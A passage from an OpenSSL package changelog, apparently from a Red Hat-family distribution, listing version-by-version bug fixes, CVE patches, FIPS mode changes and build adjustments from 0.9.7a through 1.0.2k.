Montgomery multiplication bug with 1024 bit modulus\n[1.0.2k-11]\n- fix deadlock in RNG in the FIPS mode in mariadb\n[1.0.2k-9]\n- fix CVE-2017-3736 - carry propagation bug in Montgomery multiplication\n[1.0.2k-8]\n- fix regression in openssl req -x509 command (#1450015)\n[1.0.2k-7]\n- handle incorrect size gracefully in aes_p8_cbc_encrypt()\n[1.0.2k-6]\n- allow long client hellos to be received by server\n[1.0.2k-5]\n- fix CPU features detection on new AMD processors\n[1.0.2k-4]\n- add support for additional STARTTLS protocols to s_client\n original backported patch by Robert Scheck (#1396209)\n[1.0.2k-3]\n- properly document the SSLv2 support removal\n[1.0.2k-2]\n- add PPC assembler updates\n[1.0.2k-1]\n- minor upstream release 1.0.2k fixing security issues\n[1.0.2j-2]\n- deprecate and disable verification of insecure hash algorithms\n- add support for /etc/pki/tls/legacy-settings also for minimum DH length\n accepted by SSL client\n- compare the encrypt and tweak key in XTS as required by FIPS\n[1.0.2j-1]\n- rebase to latest upstream release from the 1.0.2 branch, ABI compatible\n[1.0.1e-60]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n[1.0.1e-58]\n- replace expired testing certificates\n[1.0.1e-57]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n[1.0.1e-56]\n- fix 1-byte memory leak in pkcs12 parse (#1312112)\n- document some options of the speed command (#1312110)\n- fix high-precision timestamps in timestamping authority\n- enable SCTP support in DTLS\n- use correct digest when exporting keying material in TLS1.2 (#1289620)\n- fix CVE-2016-0799 - memory issues in BIO_printf\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-55]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-54]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-53]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-52]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-51]\n- fix the CVE-2015-1791 fix (broken server side renegotiation)\n[1.0.1e-50]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-49]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-48]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-47]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-46]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-45]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-44]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-43]\n- fix broken error detection when unwrapping unpadded key\n[1.0.1e-42.1]\n- fix the RFC 5649 for key material that does not need padding\n[1.0.1e-42]\n- test in the non-FIPS RSA keygen for minimal distance of p and q\n similarly to the FIPS RSA keygen\n[1.0.1e-41]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-40]\n- use FIPS approved method for computation of d in RSA\n- copy digest algorithm when handling SNI context switch\n[1.0.1e-39]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-38]\n- do FIPS algorithm selftest before the integrity check\n[1.0.1e-37]\n- add support for RFC 5649 (#1119738)\n- do not pass the FIPS integrity check if the .hmac files are empty (#1128849)\n- add ECC TLS extensions to DTLS (#1119803)\n- do not send ECC ciphersuites in SSLv2 client hello (#1090955)\n- properly propagate encryption failure in BIO_f_cipher (#1072439)\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n- improve documentation of ciphersuites - patch by Hubert Kario (#1108026)\n- use case insensitive comparison for servername in s_server (#1081163)\n- add support for automatic ECDH curve selection on server (#1080128)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-36]\n- add support for ppc64le architecture\n- add Power 8 optimalizations\n[1.0.1e-35]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-34.3]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-34]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-33]\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-32]\n- avoid unnecessary reseeding in BN_rand in the FIPS mode\n[1.0.1e-31]\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make expiration and key length changeable by DAYS and KEYLEN\n variables in the certificate Makefile (#1058108)\n- change default hash to sha256 (#1062325)\n- lower the actual 3des strength so it is sorted behind aes128 (#1056616)\n[1:1.0.1e-30]\n- Mass rebuild 2014-01-24\n[1.0.1e-29]\n- rebuild with -O3 on ppc64 architecture\n[1.0.1e-28]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1:1.0.1e-27]\n- Mass rebuild 2013-12-27\n[1.0.1e-26]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n- drop weak ciphers from the default TLS ciphersuite list\n- add back some symbols that were dropped with update to 1.0.1 branch\n- more FIPS validation requirement changes\n[1.0.1e-25]\n- fix locking and reseeding problems with FIPS drbg\n[1.0.1e-24]\n- additional changes required for FIPS validation\n- disable verification of certificate, CRL, and OCSP signatures\n using MD5 if OPENSSL_ENABLE_MD5_VERIFY environment variable\n is not set\n[1.0.1e-23]\n- add back support for secp521r1 EC curve\n- add aarch64 to Configure (#969692)\n[1.0.1e-22]\n- do not advertise ECC curves we do not support (#1022493)\n[1.0.1e-21]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n- drop the -fips subpackage, installation of dracut-fips marks that the FIPS\n module is installed\n- avoid dlopening libssl.so from libcrypto\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-20]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n- try to avoid some races when updating the -fips subpackage\n[1.0.1e-19]\n- use version-release in .hmac suffix to avoid overwrite\n during upgrade\n[1.0.1e-18]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-16]\n- add -fips subpackage that contains the FIPS module files\n[1.0.1e-15]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-14]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-13]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-12]\n- use _prefix macro\n[1.0.1e-11]\n- add openssl.cnf.5 manpage symlink to config.5\n[1.0.1e-10]\n- add relro linking flag\n[1.0.1e-9]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-8]\n- disable GOST engine\n[1.0.1e-7]\n- add symbol version for ECC functions\n[1.0.1e-6]\n- update the FIPS selftests to use 256 bit curves\n[1.0.1e-5]\n- enabled NIST Suite B ECC curves and algorithms\n[1.0.1e-4]\n- fix random bad record mac errors (#918981)\n[1.0.1e-3]\n- fix up the SHLIB_VERSION_NUMBER\n[1.0.1e-2]\n- disable ZLIB loading by default (due to CRIME attack)\n[1.0.1e-1]\n- new upstream version\n[1.0.1c-12]\n- more fixes from upstream\n- fix errors in manual causing build failure (#904777)\n[1.0.1c-11]\n- add script for renewal of a self-signed cert by Philip Prindeville (#871566)\n- allow X509_issuer_and_serial_hash() produce correct result in\n the FIPS mode (#881336)\n[1.0.1c-10]\n- do not load default verify paths if CApath or CAfile specified (#884305)\n[1.0.1c-9]\n- more fixes from upstream CVS\n- fix DSA key pairwise check (#878597)\n[1.0.1c-8]\n- use 1024 bit DH parameters in s_server as 512 bit is not allowed\n in FIPS mode and it is quite weak anyway\n[1.0.1c-7]\n- add missing initialization of str in aes_ccm_init_key (#853963)\n- add important patches from upstream CVS\n- use the secure_getenv() with new glibc\n[1:1.0.1c-6]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_18_Mass_Rebuild\n[1.0.1c-5]\n- use __getenv_secure() instead of __libc_enable_secure\n[1.0.1c-4]\n- do not move libcrypto to /lib\n- do not use environment variables if __libc_enable_secure is on\n- fix strict aliasing problems in modes\n[1.0.1c-3]\n- fix DSA key generation in FIPS mode (#833866)\n- allow duplicate FIPS_mode_set(1)\n- enable build on ppc64 subarch (#834652)\n[1.0.1c-2]\n- fix s_server with new glibc when no global IPv6 address (#839031)\n- make it build with new Perl\n[1.0.1c-1]\n- new upstream version\n[1.0.1b-1]\n- new upstream version\n[1.0.1a-1]\n- new upstream version fixing CVE-2012-2110\n[1.0.1-3]\n- add Kerberos 5 libraries to pkgconfig for static linking (#807050)\n[1.0.1-2]\n- backports from upstream CVS\n- fix segfault when /dev/urandom is not available (#809586)\n[1.0.1-1]\n- new upstream release\n[1.0.1-0.3.beta3]\n- add obsoletes to assist multilib updates (#799636)\n[1.0.1-0.2.beta3]\n- epoch bumped to 1 due to revert to 1.0.0g on Fedora 17\n- new upstream release from the 1.0.1 branch\n- fix s390x build (#798411)\n- versioning for the SSLeay symbol (#794950)\n- add -DPURIFY to build flags (#797323)\n- filter engine provides\n- split the libraries to a separate -libs package\n- add make to requires on the base package (#783446)\n[1.0.1-0.1.beta2]\n- new upstream release from the 1.0.1 branch, ABI compatible\n- add documentation for the -no_ign_eof option\n[1.0.0g-1]\n- new upstream release fixing CVE-2012-0050 - DoS regression in\n DTLS support introduced by the previous release (#782795)\n[1.0.0f-1]\n- new upstream release fixing multiple CVEs\n[1.0.0e-4]\n- move the libraries needed for static linking to Libs.private\n[1.0.0e-3]\n- do not use AVX instructions when osxsave bit not set\n- add direct known answer tests for SHA2 algorithms\n[1.0.0e-2]\n- fix missing initialization of variable in CHIL engine\n[1.0.0e-1]\n- new upstream release fixing CVE-2011-3207 (#736088)\n[1.0.0d-8]\n- drop the separate engine for Intel acceleration improvements\n and merge in the AES-NI, SHA1, and RC4 optimizations\n- add support for OPENSSL_DISABLE_AES_NI environment variable\n that disables the AES-NI support\n[1.0.0d-7]\n- correct openssl cms help output (#636266)\n- more tolerant starttls detection in XMPP protocol (#608239)\n[1.0.0d-6]\n- add support for newest Intel acceleration improvements backported\n from upstream by Intel in form of a separate engine\n[1.0.0d-5]\n- allow the AES-NI engine in the FIPS mode\n[1.0.0d-4]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0d-3]\n- add support for VIA Padlock on 64bit arch from upstream (#617539)\n- do not return bogus values from load_certs (#652286)\n[1.0.0d-2]\n- clarify apps help texts for available digest algorithms (#693858)\n[1.0.0d-1]\n- new upstream release fixing CVE-2011-0014 (OCSP stapling vulnerability)\n[1.0.0c-4]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_15_Mass_Rebuild\n[1.0.0c-3]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0c-2]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers\n[1.0.0c-1]\n- new upstream version fixing CVE-2010-4180\n[1.0.0b-3]\n- replace the revert for the s390x bignum asm routines with\n fix from upstream\n[1.0.0b-2]\n- revert upstream change in s390x bignum asm routines\n[1.0.0b-1]\n- new upstream version fixing CVE-2010-3864 (#649304)\n[1.0.0a-3]\n- make SHLIB_VERSION reflect the library suffix\n[1.0.0a-2]\n- openssl man page fix (#609484)\n[1.0.0a-1]\n- new upstream patch release, fixes CVE-2010-0742 (#598738)\n and CVE-2010-1633 (#598732)\n[1.0.0-5]\n- pkgconfig files now contain the correct libdir (#593723)\n[1.0.0-4]\n- make CA dir readable - the private keys are in private subdir (#584810)\n[1.0.0-3]\n- a few fixes from upstream CVS\n- move libcrypto to /lib (#559953)\n[1.0.0-2]\n- set UTC timezone on pod2man run (#578842)\n- make X509_NAME_hash_old work in FIPS mode\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA 